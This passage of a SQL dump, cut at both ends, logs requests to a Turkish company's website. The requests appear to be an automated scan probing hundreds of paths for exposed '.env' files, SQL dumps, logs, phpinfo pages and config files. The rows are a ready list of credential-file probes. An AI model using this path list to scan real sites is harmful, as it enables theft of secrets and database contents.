00:00:00',301),(61825,'https://www.3s-technologies.com.tr/en/containerregistry/.env',NULL,'','',1,0,'2026-04-12 10:38:35','0000-00-00 00:00:00',301),(61826,'https://www.3s-technologies.com.tr/en/containers/.env',NULL,'','',1,0,'2026-04-12 10:38:35','0000-00-00 00:00:00',301),(61827,'https://www.3s-technologies.com.tr/en/content/.env',NULL,'','',1,0,'2026-04-12 10:38:36','0000-00-00 00:00:00',301),(61828,'https://www.3s-technologies.com.tr/en/control/.env',NULL,'','',1,0,'2026-04-12 10:38:36','0000-00-00 00:00:00',301),(61829,'https://www.3s-technologies.com.tr/en/core/app/.env',NULL,'','',1,0,'2026-04-12 10:38:37','0000-00-00 00:00:00',301),(61830,'https://www.3s-technologies.com.tr/en/core/datavase/.env',NULL,'','',1,0,'2026-04-12 10:38:37','0000-00-00 00:00:00',301),(61831,'https://www.3s-technologies.com.tr/en/core/persistence/.env',NULL,'','',1,0,'2026-04-12 10:38:37','0000-00-00 00:00:00',301),(61832,'https://www.3s-technologies.com.tr/en/core/src/main/resources/org/jobrunr/dashboard/frontend/.env',NULL,'','',1,0,'2026-04-12 10:38:38','0000-00-00 00:00:00',301),(61833,'https://www.3s-technologies.com.tr/en/counterblockd/.env',NULL,'','',1,0,'2026-04-12 10:38:38','0000-00-00 00:00:00',301),(61834,'https://www.3s-technologies.com.tr/en/counterwallet/.env',NULL,'','',1,0,'2026-04-12 10:38:39','0000-00-00 00:00:00',301),(61835,'https://www.3s-technologies.com.tr/en/cp/.env',NULL,'','',1,0,'2026-04-12 10:38:39','0000-00-00 00:00:00',301),(61836,'https://www.3s-technologies.com.tr/en/cronlab/.env',NULL,'','',1,0,'2026-04-12 10:38:40','0000-00-00 00:00:00',301),(61837,'https://www.3s-technologies.com.tr/en/cryo_project/.env',NULL,'','',1,0,'2026-04-12 10:38:40','0000-00-00 00:00:00',301),(61838,'https://www.3s-technologies.com.tr/en/css/.env',NULL,'','',1,0,'2026-04-12 10:38:41','0000-00-00 00:00:00',301),(61839,'https://www.3s-technologies.com.tr/en/custom/.env',NULL,'','',1,0,'2026-04-12 10:38:41','0000-00-00 00:00:00',301),(61840,'https://www.3s-technologies.com.tr/en/d/.env',NULL,'','',1,0,'2026-04-12 10:38:41','0000-00-00 00:00:00',301),(61841,'https://www.3s-technologies.com.tr/en/dashboard/i.php',NULL,'','',1,0,'2026-04-12 10:38:42','0000-00-00 00:00:00',301),(61842,'https://www.3s-technologies.com.tr/en/dashboard/info.php',NULL,'','',1,0,'2026-04-12 10:38:42','0000-00-00 00:00:00',301),(61843,'https://www.3s-technologies.com.tr/en/dashboard/test.php',NULL,'','',1,0,'2026-04-12 10:38:43','0000-00-00 00:00:00',301),(61844,'https://www.3s-technologies.com.tr/en/data/.env',NULL,'','',1,0,'2026-04-12 10:38:44','0000-00-00 00:00:00',301),(61845,'https://www.3s-technologies.com.tr/en/database/.env',NULL,'','',1,0,'2026-04-12 10:38:44','0000-00-00 00:00:00',301),(61846,'https://www.3s-technologies.com.tr/en/dataset1/.env',NULL,'','',1,0,'2026-04-12 10:38:44','0000-00-00 00:00:00',301),(61847,'https://www.3s-technologies.com.tr/en/dataset2/.env',NULL,'','',1,0,'2026-04-12 10:38:45','0000-00-00 00:00:00',301),(61848,'https://www.3s-technologies.com.tr/en/db-admin',NULL,'','',1,0,'2026-04-12 10:38:45','0000-00-00 00:00:00',301),(61849,'https://www.3s-technologies.com.tr/en/db.php',NULL,'','',1,0,'2026-04-12 10:38:46','0000-00-00 00:00:00',301),(61850,'https://www.3s-technologies.com.tr/en/db.sql',NULL,'','',1,0,'2026-04-12 10:38:46','0000-00-00 00:00:00',301),(61851,'https://www.3s-technologies.com.tr/en/db_backup.sql',NULL,'','',1,0,'2026-04-12 10:38:47','0000-00-00 00:00:00',301),(61852,'https://www.3s-technologies.com.tr/en/debug',NULL,'','',1,0,'2026-04-12 10:38:47','0000-00-00 00:00:00',301),(61853,'https://www.3s-technologies.com.tr/en/debug.json',NULL,'','',1,0,'2026-04-12 10:38:47','0000-00-00 00:00:00',301),(61854,'https://www.3s-technologies.com.tr/en/debug.log',NULL,'','',1,0,'2026-04-12 10:38:48','0000-00-00 00:00:00',301),(61855,'https://www.3s-technologies.com.tr/en/debug.php',NULL,'','',1,0,'2026-04-12 10:38:48','0000-00-00 00:00:00',301),(61856,'https://www.3s-technologies.com.tr/en/debug/default/view',NULL,'','',2,0,'2026-04-12 10:38:48','0000-00-00 00:00:00',301),(61857,'https://www.3s-technologies.com.tr/en/debug/default/view.html',NULL,'','',1,0,'2026-04-12 10:38:49','0000-00-00 00:00:00',301),(61858,'https://www.3s-technologies.com.tr/en/default/.env',NULL,'','',1,0,'2026-04-12 10:38:50','0000-00-00 00:00:00',301),(61859,'https://www.3s-technologies.com.tr/en/delivery/.env',NULL,'','',1,0,'2026-04-12 10:38:50','0000-00-00 00:00:00',301),(61860,'https://www.3s-technologies.com.tr/en/demo-app/.env',NULL,'','',1,0,'2026-04-12 10:38:51','0000-00-00 00:00:00',301),(61861,'https://www.3s-technologies.com.tr/en/demo/.env',NULL,'','',1,0,'2026-04-12 10:38:51','0000-00-00 00:00:00',301),(61862,'https://www.3s-technologies.com.tr/en/dep.php',NULL,'','',1,0,'2026-04-12 10:38:51','0000-00-00 00:00:00',301),(61863,'https://www.3s-technologies.com.tr/en/deploy.php',NULL,'','',1,0,'2026-04-12 10:38:52','0000-00-00 00:00:00',301),(61864,'https://www.3s-technologies.com.tr/en/deploy/.env',NULL,'','',1,0,'2026-04-12 10:38:52','0000-00-00 00:00:00',301),(61865,'https://www.3s-technologies.com.tr/en/deployment-config.json',NULL,'','',1,0,'2026-04-12 10:38:53','0000-00-00 00:00:00',301),(61866,'https://www.3s-technologies.com.tr/en/dev-api',NULL,'','',1,0,'2026-04-12 10:38:53','0000-00-00 00:00:00',301),(61867,'https://www.3s-technologies.com.tr/en/dev-env/.env',NULL,'','',1,0,'2026-04-12 10:38:54','0000-00-00 00:00:00',301),(61868,'https://www.3s-technologies.com.tr/en/dev.php',NULL,'','',1,0,'2026-04-12 10:38:54','0000-00-00 00:00:00',301),(61869,'https://www.3s-technologies.com.tr/en/dev/.env.local',NULL,'','',1,0,'2026-04-12 10:38:54','0000-00-00 00:00:00',301),(61870,'https://www.3s-technologies.com.tr/en/dev_env/.env',NULL,'','',1,0,'2026-04-12 10:38:55','0000-00-00 00:00:00',301),(61871,'https://www.3s-technologies.com.tr/en/developer.php',NULL,'','',1,0,'2026-04-12 10:38:55','0000-00-00 00:00:00',301),(61872,'https://www.3s-technologies.com.tr/en/developer/.env',NULL,'','',1,0,'2026-04-12 10:38:56','0000-00-00 00:00:00',301),(61873,'https://www.3s-technologies.com.tr/en/developerslv/.env',NULL,'','',1,0,'2026-04-12 10:38:56','0000-00-00 00:00:00',301),(61874,'https://www.3s-technologies.com.tr/en/development/.env',NULL,'','',1,0,'2026-04-12 10:38:57','0000-00-00 00:00:00',301),(61875,'https://www.3s-technologies.com.tr/en/devs.php',NULL,'','',1,0,'2026-04-12 10:38:57','0000-00-00 00:00:00',301),(61876,'https://www.3s-technologies.com.tr/en/devtools',NULL,'','',1,0,'2026-04-12 10:38:58','0000-00-00 00:00:00',301),(61877,'https://www.3s-technologies.com.tr/en/directories/.env',NULL,'','',1,0,'2026-04-12 10:38:58','0000-00-00 00:00:00',301),(61878,'https://www.3s-technologies.com.tr/en/dist/.env',NULL,'','',1,0,'2026-04-12 10:38:59','0000-00-00 00:00:00',301),(61879,'https://www.3s-technologies.com.tr/en/dist/js/app.[hash].js',NULL,'','',1,0,'2026-04-12 10:38:59','0000-00-00 00:00:00',301),(61880,'https://www.3s-technologies.com.tr/en/django-blog/.env',NULL,'','',1,0,'2026-04-12 10:39:00','0000-00-00 00:00:00',301),(61881,'https://www.3s-technologies.com.tr/en/django/.env',NULL,'','',1,0,'2026-04-12 10:39:00','0000-00-00 00:00:00',301),(61882,'https://www.3s-technologies.com.tr/en/django_project_path/.env',NULL,'','',1,0,'2026-04-12 10:39:01','0000-00-00 00:00:00',301),(61883,'https://www.3s-technologies.com.tr/en/doc/.env',NULL,'','',1,0,'2026-04-12 10:39:01','0000-00-00 00:00:00',301),(61884,'https://www.3s-technologies.com.tr/en/docker-compose.yml',NULL,'','',1,0,'2026-04-12 10:39:02','0000-00-00 00:00:00',301),(61885,'https://www.3s-technologies.com.tr/en/docker-compose/.env',NULL,'','',1,0,'2026-04-12 10:39:02','0000-00-00 00:00:00',301),(61886,'https://www.3s-technologies.com.tr/en/docker-compose/platform/.env',NULL,'','',1,0,'2026-04-12 10:39:02','0000-00-00 00:00:00',301),(61887,'https://www.3s-technologies.com.tr/en/docker-elk/.env',NULL,'','',1,0,'2026-04-12 10:39:03','0000-00-00 00:00:00',301),(61888,'https://www.3s-technologies.com.tr/en/docker-network-healthcheck/.env',NULL,'','',1,0,'2026-04-12 10:39:03','0000-00-00 00:00:00',301),(61889,'https://www.3s-technologies.com.tr/en/docker-node-mongo-redis/.env',NULL,'','',1,0,'2026-04-12 10:39:04','0000-00-00 00:00:00',301),(61890,'https://www.3s-technologies.com.tr/en/docker/compose/withmongo/.env',NULL,'','',1,0,'2026-04-12 10:39:04','0000-00-00 00:00:00',301),(61891,'https://www.3s-technologies.com.tr/en/docker/compose/withpostgres/.env',NULL,'','',1,0,'2026-04-12 10:39:05','0000-00-00 00:00:00',301),(61892,'https://www.3s-technologies.com.tr/en/docker/database/.env',NULL,'','',1,0,'2026-04-12 10:39:05','0000-00-00 00:00:00',301),(61893,'https://www.3s-technologies.com.tr/en/docker/db/.env',NULL,'','',1,0,'2026-04-12 10:39:06','0000-00-00 00:00:00',301),(61894,'https://www.3s-technologies.com.tr/en/docker/dev/.env',NULL,'','',1,0,'2026-04-12 10:39:06','0000-00-00 00:00:00',301),(61895,'https://www.3s-technologies.com.tr/en/docker/examples/compose/.env',NULL,'','',1,0,'2026-04-12 10:39:06','0000-00-00 00:00:00',301),(61896,'https://www.3s-technologies.com.tr/en/docker/postgres/.env',NULL,'','',1,0,'2026-04-12 10:39:07','0000-00-00 00:00:00',301),(61897,'https://www.3s-technologies.com.tr/en/docker/webdav/.env',NULL,'','',1,0,'2026-04-12 10:39:07','0000-00-00 00:00:00',301),(61898,'https://www.3s-technologies.com.tr/en/docs/.env',NULL,'','',1,0,'2026-04-12 10:39:08','0000-00-00 00:00:00',301),(61899,'https://www.3s-technologies.com.tr/en/dodoswap-client/.env',NULL,'','',1,0,'2026-04-12 10:39:08','0000-00-00 00:00:00',301),(61900,'https://www.3s-technologies.com.tr/en/dotfiles/.env',NULL,'','',1,0,'2026-04-12 10:39:09','0000-00-00 00:00:00',301),(61901,'https://www.3s-technologies.com.tr/en/download/.env',NULL,'','',1,0,'2026-04-12 10:39:09','0000-00-00 00:00:00',301),(61902,'https://www.3s-technologies.com.tr/en/downloads/.env',NULL,'','',1,0,'2026-04-12 10:39:10','0000-00-00 00:00:00',301),(61903,'https://www.3s-technologies.com.tr/en/drupal/.env',NULL,'','',1,0,'2026-04-12 10:39:10','0000-00-00 00:00:00',301),(61904,'https://www.3s-technologies.com.tr/en/dump.sql',NULL,'','',1,0,'2026-04-12 10:39:11','0000-00-00 00:00:00',301),(61905,'https://www.3s-technologies.com.tr/en/e2e/.env',NULL,'','',1,0,'2026-04-12 10:39:11','0000-00-00 00:00:00',301),(61906,'https://www.3s-technologies.com.tr/en/engine/.env',NULL,'','',1,0,'2026-04-12 10:39:12','0000-00-00 00:00:00',301),(61907,'https://www.3s-technologies.com.tr/en/env.example',NULL,'','',1,0,'2026-04-12 10:39:12','0000-00-00 00:00:00',301),(61908,'https://www.3s-technologies.com.tr/en/env.save',NULL,'','',1,0,'2026-04-12 10:39:13','0000-00-00 00:00:00',301),(61909,'https://www.3s-technologies.com.tr/en/env.template',NULL,'','',1,0,'2026-04-12 10:39:13','0000-00-00 00:00:00',301),(61910,'https://www.3s-technologies.com.tr/en/env/dockers/mariadb-test/.env',NULL,'','',1,0,'2026-04-12 10:39:14','0000-00-00 00:00:00',301),(61911,'https://www.3s-technologies.com.tr/en/env/dockers/php-apache/.env',NULL,'','',1,0,'2026-04-12 10:39:14','0000-00-00 00:00:00',301),(61912,'https://www.3s-technologies.com.tr/en/env/example/.env',NULL,'','',1,0,'2026-04-12 10:39:15','0000-00-00 00:00:00',301),(61913,'https://www.3s-technologies.com.tr/en/env/template/.env',NULL,'','',1,0,'2026-04-12 10:39:15','0000-00-00 00:00:00',301),(61914,'https://www.3s-technologies.com.tr/en/environments/local/.env',NULL,'','',1,0,'2026-04-12 10:39:15','0000-00-00 00:00:00',301),(61915,'https://www.3s-technologies.com.tr/en/environments/production/.env',NULL,'','',1,0,'2026-04-12 10:39:16','0000-00-00 00:00:00',301),(61916,'https://www.3s-technologies.com.tr/en/envs/.env',NULL,'','',1,0,'2026-04-12 10:39:16','0000-00-00 00:00:00',301),(61917,'https://www.3s-technologies.com.tr/en/error.log',NULL,'','',1,0,'2026-04-12 10:39:17','0000-00-00 00:00:00',301),(61918,'https://www.3s-technologies.com.tr/en/error/.env',NULL,'','',1,0,'2026-04-12 10:39:17','0000-00-00 00:00:00',301),(61919,'https://www.3s-technologies.com.tr/en/errors/.env',NULL,'','',1,0,'2026-04-12 10:39:18','0000-00-00 00:00:00',301),(61920,'https://www.3s-technologies.com.tr/en/example/.env',NULL,'','',1,0,'2026-04-12 10:39:18','0000-00-00 00:00:00',301),(61921,'https://www.3s-technologies.com.tr/en/example02-golang-package/import-underscore/.env',NULL,'','',1,0,'2026-04-12 10:39:19','0000-00-00 00:00:00',301),(61922,'https://www.3s-technologies.com.tr/en/example27-how-to-load-env/sample01/.env',NULL,'','',1,0,'2026-04-12 10:39:19','0000-00-00 00:00:00',301),(61923,'https://www.3s-technologies.com.tr/en/example27-how-to-load-env/sample02/.env',NULL,'','',1,0,'2026-04-12 10:39:19','0000-00-00 00:00:00',301),(61924,'https://www.3s-technologies.com.tr/en/examples/.env',NULL,'','',1,0,'2026-04-12 10:39:20','0000-00-00 00:00:00',301),(61925,'https://www.3s-technologies.com.tr/en/examples/01-simple-model/.env',NULL,'','',1,0,'2026-04-12 10:39:20','0000-00-00 00:00:00',301),(61926,'https://www.3s-technologies.com.tr/en/examples/02-complex-example/.env',NULL,'','',1,0,'2026-04-12 10:39:21','0000-00-00 00:00:00',301),(61927,'https://www.3s-technologies.com.tr/en/examples/03-one-to-many-relationship/.env',NULL,'','',1,0,'2026-04-12 10:39:21','0000-00-00 00:00:00',301),(61928,'https://www.3s-technologies.com.tr/en/examples/04-many-to-many-relationship/.env',NULL,'','',1,0,'2026-04-12 10:39:22','0000-00-00 00:00:00',301),(61929,'https://www.3s-technologies.com.tr/en/examples/05-migrations/.env',NULL,'','',1,0,'2026-04-12 10:39:22','0000-00-00 00:00:00',301),(61930,'https://www.3s-technologies.com.tr/en/examples/06-base-service/.env',NULL,'','',1,0,'2026-04-12 10:39:23','0000-00-00 00:00:00',301),(61931,'https://www.3s-technologies.com.tr/en/examples/07-feature-flags/.env',NULL,'','',1,0,'2026-04-12 10:39:23','0000-00-00 00:00:00',301),(61932,'https://www.3s-technologies.com.tr/en/examples/08-performance/.env',NULL,'','',1,0,'2026-04-12 10:39:24','0000-00-00 00:00:00',301),(61933,'https://www.3s-technologies.com.tr/en/examples/09-production/.env',NULL,'','',1,0,'2026-04-12 10:39:24','0000-00-00 00:00:00',301),(61934,'https://www.3s-technologies.com.tr/en/examples/10-subscriptions/.env',NULL,'','',1,0,'2026-04-12 10:39:25','0000-00-00 00:00:00',301),(61935,'https://www.3s-technologies.com.tr/en/examples/11-transactions/.env',NULL,'','',1,0,'2026-04-12 10:39:25','0000-00-00 00:00:00',301),(61936,'https://www.3s-technologies.com.tr/en/examples/drupal-separate-services/.env',NULL,'','',1,0,'2026-04-12 10:39:26','0000-00-00 00:00:00',301),(61937,'https://www.3s-technologies.com.tr/en/examples/react-dashboard/backend/.env',NULL,'','',1,0,'2026-04-12 10:39:26','0000-00-00 00:00:00',301),(61938,'https://www.3s-technologies.com.tr/en/examples/sdl-first/.env',NULL,'','',1,0,'2026-04-12 10:39:27','0000-00-00 00:00:00',301),(61939,'https://www.3s-technologies.com.tr/en/examples/sdl-first/prisma/.env',NULL,'','',1,0,'2026-04-12 10:39:27','0000-00-00 00:00:00',301),(61940,'https://www.3s-technologies.com.tr/en/examples/vue-dashboard/backend/.env',NULL,'','',1,0,'2026-04-12 10:39:28','0000-00-00 00:00:00',301),(61941,'https://www.3s-technologies.com.tr/en/examples/web/.env',NULL,'','',1,0,'2026-04-12 10:39:28','0000-00-00 00:00:00',301),(61942,'https://www.3s-technologies.com.tr/en/examples/with-cookie-auth-fauna/.env',NULL,'','',1,0,'2026-04-12 10:39:29','0000-00-00 00:00:00',301),(61943,'https://www.3s-technologies.com.tr/en/examples/with-dotenv/.env',NULL,'','',1,0,'2026-04-12 10:39:29','0000-00-00 00:00:00',301),(61944,'https://www.3s-technologies.com.tr/en/examples/with-firebase-authentication-serverless/.env',NULL,'','',1,0,'2026-04-12 10:39:30','0000-00-00 00:00:00',301),(61945,'https://www.3s-technologies.com.tr/en/examples/with-react-relay-network-modern/.env',NULL,'','',1,0,'2026-04-12 10:39:30','0000-00-00 00:00:00',301),(61946,'https://www.3s-technologies.com.tr/en/examples/with-relay-modern/.env',NULL,'','',1,0,'2026-04-12 10:39:31','0000-00-00 00:00:00',301),(61947,'https://www.3s-technologies.com.tr/en/examples/with-universal-configuration-build-time/.env',NULL,'','',1,0,'2026-04-12 10:39:31','0000-00-00 00:00:00',301),(61948,'https://www.3s-technologies.com.tr/en/exapi/.env',NULL,'','',1,0,'2026-04-12 10:39:32','0000-00-00 00:00:00',301),(61949,'https://www.3s-technologies.com.tr/en/exercise.frontend/.env',NULL,'','',1,0,'2026-04-12 10:39:32','0000-00-00 00:00:00',301),(61950,'https://www.3s-technologies.com.tr/en/exercise.frontend/train/.env',NULL,'','',1,0,'2026-04-12 10:39:32','0000-00-00 00:00:00',301),(61951,'https://www.3s-technologies.com.tr/en/export/.env',NULL,'','',1,0,'2026-04-12 10:39:33','0000-00-00 00:00:00',301),(61952,'https://www.3s-technologies.com.tr/en/fastlane/.env',NULL,'','',1,0,'2026-04-12 10:39:33','0000-00-00 00:00:00',301),(61953,'https://www.3s-technologies.com.tr/en/favicons/.env',NULL,'','',1,0,'2026-04-12 10:39:34','0000-00-00 00:00:00',301),(61954,'https://www.3s-technologies.com.tr/en/favs/.env',NULL,'','',1,0,'2026-04-12 10:39:34','0000-00-00 00:00:00',301),(61955,'https://www.3s-technologies.com.tr/en/fe/huey/.env',NULL,'','',1,0,'2026-04-12 10:39:35','0000-00-00 00:00:00',301),(61956,'https://www.3s-technologies.com.tr/en/fedex/.env',NULL,'','',1,0,'2026-04-12 10:39:35','0000-00-00 00:00:00',301),(61957,'https://www.3s-technologies.com.tr/en/fhir-api/.env',NULL,'','',1,0,'2026-04-12 10:39:36','0000-00-00 00:00:00',301),(61958,'https://www.3s-technologies.com.tr/en/files/.env',NULL,'','',1,0,'2026-04-12 10:39:36','0000-00-00 00:00:00',301),(61959,'https://www.3s-technologies.com.tr/en/fileserver/.env',NULL,'','',1,0,'2026-04-12 10:39:37','0000-00-00 00:00:00',301),(61960,'https://www.3s-technologies.com.tr/en/films/.env',NULL,'','',1,0,'2026-04-12 10:39:37','0000-00-00 00:00:00',301),(61961,'https://www.3s-technologies.com.tr/en/final_project/airflow_dag/.env',NULL,'','',1,0,'2026-04-12 10:39:38','0000-00-00 00:00:00',301),(61962,'https://www.3s-technologies.com.tr/en/final_project/kafka_twitter/.env',NULL,'','',1,0,'2026-04-12 10:39:38','0000-00-00 00:00:00',301),(61963,'https://www.3s-technologies.com.tr/en/final_project/startingfile/.env',NULL,'','',1,0,'2026-04-12 10:39:39','0000-00-00 00:00:00',301),(61964,'https://www.3s-technologies.com.tr/en/finalversion/lcomernbootcamp/projbackend/.env',NULL,'','',1,0,'2026-04-12 10:39:39','0000-00-00 00:00:00',301),(61965,'https://www.3s-technologies.com.tr/en/firebase.json',NULL,'','',1,0,'2026-04-12 10:39:40','0000-00-00 00:00:00',301),(61966,'https://www.3s-technologies.com.tr/en/first-network/.env',NULL,'','',1,0,'2026-04-12 10:39:40','0000-00-00 00:00:00',301),(61967,'https://www.3s-technologies.com.tr/en/first_config/.env',NULL,'','',1,0,'2026-04-12 10:39:40','0000-00-00 00:00:00',301),(61968,'https://www.3s-technologies.com.tr/en/fisdom/fisdom/.env',NULL,'','',1,0,'2026-04-12 10:39:41','0000-00-00 00:00:00',301),(61969,'https://www.3s-technologies.com.tr/en/fixtures/blocks/.env',NULL,'','',1,0,'2026-04-12 10:39:41','0000-00-00 00:00:00',301),(61970,'https://www.3s-technologies.com.tr/en/fixtures/fiber-debugger/.env',NULL,'','',1,0,'2026-04-12 10:39:42','0000-00-00 00:00:00',301),(61971,'https://www.3s-technologies.com.tr/en/fixtures/flight/.env',NULL,'','',1,0,'2026-04-12 10:39:42','0000-00-00 00:00:00',301),(61972,'https://www.3s-technologies.com.tr/en/fixtures/kitchensink/.env',NULL,'','',1,0,'2026-04-12 10:39:43','0000-00-00 00:00:00',301),(61973,'https://www.3s-technologies.com.tr/en/flask/.env',NULL,'','',1,0,'2026-04-12 10:39:43','0000-00-00 00:00:00',301),(61974,'https://www.3s-technologies.com.tr/en/flask_test_uploads/.env',NULL,'','',1,0,'2026-04-12 10:39:44','0000-00-00 00:00:00',301),(61975,'https://www.3s-technologies.com.tr/en/fm/.env',NULL,'','',1,0,'2026-04-12 10:39:44','0000-00-00 00:00:00',301),(61976,'https://www.3s-technologies.com.tr/en/font-icons/.env',NULL,'','',1,0,'2026-04-12 10:39:45','0000-00-00 00:00:00',301),(61977,'https://www.3s-technologies.com.tr/en/fonts/.env',NULL,'','',1,0,'2026-04-12 10:39:45','0000-00-00 00:00:00',301),(61978,'https://www.3s-technologies.com.tr/en/framework/.env',NULL,'','',1,0,'2026-04-12 10:39:46','0000-00-00 00:00:00',301),(61979,'https://www.3s-technologies.com.tr/en/front-app/.env',NULL,'','',1,0,'2026-04-12 10:39:46','0000-00-00 00:00:00',301),(61980,'https://www.3s-technologies.com.tr/en/front-empathy/.env',NULL,'','',1,0,'2026-04-12 10:39:47','0000-00-00 00:00:00',301),(61981,'https://www.3s-technologies.com.tr/en/front-end/.env',NULL,'','',1,0,'2026-04-12 10:39:47','0000-00-00 00:00:00',301),(61982,'https://www.3s-technologies.com.tr/en/front/.env',NULL,'','',1,0,'2026-04-12 10:39:48','0000-00-00 00:00:00',301),(61983,'https://www.3s-technologies.com.tr/en/front/src/.env',NULL,'','',1,0,'2026-04-12 10:39:48','0000-00-00 00:00:00',301),(61984,'https://www.3s-technologies.com.tr/en/frontend/momentum-fe/.env',NULL,'','',1,0,'2026-04-12 10:39:49','0000-00-00 00:00:00',301),(61985,'https://www.3s-technologies.com.tr/en/frontend/react/.env',NULL,'','',1,0,'2026-04-12 10:39:49','0000-00-00 00:00:00',301),(61986,'https://www.3s-technologies.com.tr/en/frontend/vue/.env',NULL,'','',1,0,'2026-04-12 10:39:50','0000-00-00 00:00:00',301),(61987,'https://www.3s-technologies.com.tr/en/frontend/web/debug/default/view',NULL,'','',1,0,'2026-04-12 10:39:50','0000-00-00 00:00:00',301),(61988,'https://www.3s-technologies.com.tr/en/frontendfinaltest/.env',NULL,'','',1,0,'2026-04-12 10:39:51','0000-00-00 00:00:00',301),(61989,'https://www.3s-technologies.com.tr/en/ftp/.env',NULL,'','',1,0,'2026-04-12 10:39:51','0000-00-00 00:00:00',301),(61990,'https://www.3s-technologies.com.tr/en/ftpmaster/.env',NULL,'','',1,0,'2026-04-12 10:39:52','0000-00-00 00:00:00',301),(61991,'https://www.3s-technologies.com.tr/en/functions/.env',NULL,'','',1,0,'2026-04-12 10:39:52','0000-00-00 00:00:00',301),(61992,'https://www.3s-technologies.com.tr/en/gcloud.json',NULL,'','',1,0,'2026-04-12 10:39:52','0000-00-00 00:00:00',301),(61993,'https://www.3s-technologies.com.tr/en/gcp/.env',NULL,'','',1,0,'2026-04-12 10:39:53','0000-00-00 00:00:00',301),(61994,'https://www.3s-technologies.com.tr/en/gists/cache',NULL,'','',1,0,'2026-04-12 10:39:53','0000-00-00 00:00:00',301),(61995,'https://www.3s-technologies.com.tr/en/gists/laravel',NULL,'','',1,0,'2026-04-12 10:39:54','0000-00-00 00:00:00',301),(61996,'https://www.3s-technologies.com.tr/en/gists/pusher',NULL,'','',1,0,'2026-04-12 10:39:54','0000-00-00 00:00:00',301),(61997,'https://www.3s-technologies.com.tr/en/github-connect/.env',NULL,'','',1,0,'2026-04-12 10:39:55','0000-00-00 00:00:00',301),(61998,'https://www.3s-technologies.com.tr/en/google/.env',NULL,'','',1,0,'2026-04-12 10:39:55','0000-00-00 00:00:00',301),(61999,'https://www.3s-technologies.com.tr/en/graphiql',NULL,'','',1,0,'2026-04-12 10:39:56','0000-00-00 00:00:00',301),(62000,'https://www.3s-technologies.com.tr/en/graphql',NULL,'','',1,0,'2026-04-12 10:39:56','0000-00-00 00:00:00',301),(62001,'https://www.3s-technologies.com.tr/en/grems-api/.env',NULL,'','',1,0,'2026-04-12 10:39:57','0000-00-00 00:00:00',301),(62002,'https://www.3s-technologies.com.tr/en/grems-frontend/.env',NULL,'','',1,0,'2026-04-12 10:39:57','0000-00-00 00:00:00',301),(62003,'https://www.3s-technologies.com.tr/en/hash/.env',NULL,'','',1,0,'2026-04-12 10:39:58','0000-00-00 00:00:00',301),(62004,'https://www.3s-technologies.com.tr/en/hasura/.env',NULL,'','',1,0,'2026-04-12 10:39:58','0000-00-00 00:00:00',301),(62005,'https://www.3s-technologies.com.tr/en/hc/restricted',NULL,'','',1,0,'2026-04-12 10:39:59','0000-00-00 00:00:00',301),(62006,'https://www.3s-technologies.com.tr/en/helmetjs/.env',NULL,'','',1,0,'2026-04-12 10:39:59','0000-00-00 00:00:00',301),(62007,'https://www.3s-technologies.com.tr/en/hgs-static/.env',NULL,'','',1,0,'2026-04-12 10:40:00','0000-00-00 00:00:00',301),(62008,'https://www.3s-technologies.com.tr/en/higlass-website/.env',NULL,'','',1,0,'2026-04-12 10:40:00','0000-00-00 00:00:00',301),(62009,'https://www.3s-technologies.com.tr/en/home/.env',NULL,'','',1,0,'2026-04-12 10:40:01','0000-00-00 00:00:00',301),(62010,'https://www.3s-technologies.com.tr/en/horde/.env',NULL,'','',1,0,'2026-04-12 10:40:01','0000-00-00 00:00:00',301),(62011,'https://www.3s-technologies.com.tr/en/hotpot-app-frontend/.env',NULL,'','',1,0,'2026-04-12 10:40:02','0000-00-00 00:00:00',301),(62012,'https://www.3s-technologies.com.tr/en/htdocs/.env',NULL,'','',1,0,'2026-04-12 10:40:02','0000-00-00 00:00:00',301),(62013,'https://www.3s-technologies.com.tr/en/html/.env',NULL,'','',1,0,'2026-04-12 10:40:03','0000-00-00 00:00:00',301),(62014,'https://www.3s-technologies.com.tr/en/http/.env',NULL,'','',1,0,'2026-04-12 10:40:03','0000-00-00 00:00:00',301),(62015,'https://www.3s-technologies.com.tr/en/httpboot/.env',NULL,'','',1,0,'2026-04-12 10:40:03','0000-00-00 00:00:00',301),(62016,'https://www.3s-technologies.com.tr/en/httpdocs/.env',NULL,'','',1,0,'2026-04-12 10:40:04','0000-00-00 00:00:00',301),(62017,'https://www.3s-technologies.com.tr/en/huniv_migration/.env',NULL,'','',1,0,'2026-04-12 10:40:04','0000-00-00 00:00:00',301),(62018,'https://www.3s-technologies.com.tr/en/icon/.env',NULL,'','',1,0,'2026-04-12 10:40:05','0000-00-00 00:00:00',301),(62019,'https://www.3s-technologies.com.tr/en/icons/.env',NULL,'','',1,0,'2026-04-12 10:40:05','0000-00-00 00:00:00',301),(62020,'https://www.3s-technologies.com.tr/en/ikiwiki/.env',NULL,'','',1,0,'2026-04-12 10:40:06','0000-00-00 00:00:00',301),(62021,'https://www.3s-technologies.com.tr/en/image_data/.env',NULL,'','',1,0,'2026-04-12 10:40:06','0000-00-00 00:00:00',301),(62022,'https://www.3s-technologies.com.tr/en/imagebord/.env',NULL,'','',1,0,'2026-04-12 10:40:07','0000-00-00 00:00:00',301),(62023,'https://www.3s-technologies.com.tr/en/images/.env',NULL,'','',1,0,'2026-04-12 10:40:07','0000-00-00 00:00:00',301),(62024,'https://www.3s-technologies.com.tr/en/img/.env',NULL,'','',1,0,'2026-04-12 10:40:08','0000-00-00 00:00:00',301),(62025,'https://www.3s-technologies.com.tr/en/in.php',NULL,'','',1,0,'2026-04-12 10:40:08','0000-00-00 00:00:00',301),(62026,'https://www.3s-technologies.com.tr/en/inc.config.php',NULL,'','',1,0,'2026-04-12 10:40:09','0000-00-00 00:00:00',301),(62027,'https://www.3s-technologies.com.tr/en/includes/.env',NULL,'','',1,0,'2026-04-12 10:40:09','0000-00-00 00:00:00',301),(62028,'https://www.3s-technologies.com.tr/en/includes/config.php',NULL,'','',1,0,'2026-04-12 10:40:10','0000-00-00 00:00:00',301),(62029,'https://www.3s-technologies.com.tr/en/index1.php',NULL,'','',1,0,'2026-04-12 10:40:11','0000-00-00 00:00:00',301),(62030,'https://www.3s-technologies.com.tr/en/inf.php',NULL,'','',1,0,'2026-04-12 10:40:11','0000-00-00 00:00:00',301),(62031,'https://www.3s-technologies.com.tr/en/info1.php',NULL,'','',1,0,'2026-04-12 10:40:12','0000-00-00 00:00:00',301),(62032,'https://www.3s-technologies.com.tr/en/info2.php',NULL,'','',1,0,'2026-04-12 10:40:12','0000-00-00 00:00:00',301),(62033,'https://www.3s-technologies.com.tr/en/info3.php',NULL,'','',1,0,'2026-04-12 10:40:13','0000-00-00 